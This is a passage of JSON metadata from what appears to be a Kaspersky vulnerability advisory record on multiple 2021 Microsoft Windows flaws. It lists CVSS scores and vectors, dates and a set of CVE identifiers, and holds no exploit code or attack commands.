advisories*:", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T00:00:00", "type": "kaspersky", "title": "KLA12345 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.7, "vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42278", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42286", "CVE-2021-42287", "CVE-2021-42288", "CVE-2021-42291"], "modified": "2022-01-18T00:00:00", "id": "KLA12345", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12345/", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}]}